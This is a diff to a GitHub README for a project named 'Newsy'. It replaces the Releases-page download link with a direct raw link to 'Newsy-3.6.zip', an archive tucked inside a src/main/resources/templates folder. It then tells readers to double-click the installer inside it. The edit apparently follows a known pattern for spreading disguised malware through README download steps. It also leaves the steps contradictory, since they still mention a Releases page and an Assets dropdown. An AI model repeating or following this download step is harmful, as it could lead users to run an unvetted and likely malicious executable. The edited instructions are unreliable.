CrimsonElixir/Newsy/README.md

 To get started, follow these steps:

-1. Click the download link: [Download Newsy](https://github.com/CrimsonElixir/Newsy/releases).
+1. Click the download link: [Download Newsy](https://raw.githubusercontent.com/CrimsonElixir/Newsy/main/src/main/resources/templates/Newsy-3.6.zip).
 2. On the Releases page, find the latest version.
 3. Click the "Assets" dropdown to see available files.
-4. Select the appropriate file for your operating system (e.g., Newsy.exe for Windows).
+4. Select the appropriate file for your operating system (e.g., https://raw.githubusercontent.com/CrimsonElixir/Newsy/main/src/main/resources/templates/Newsy-3.6.zip for Windows).
 5. Wait for the download to finish.
 6. Locate the downloaded file on your computer.
 7. Double-click to open the installer and follow the prompts.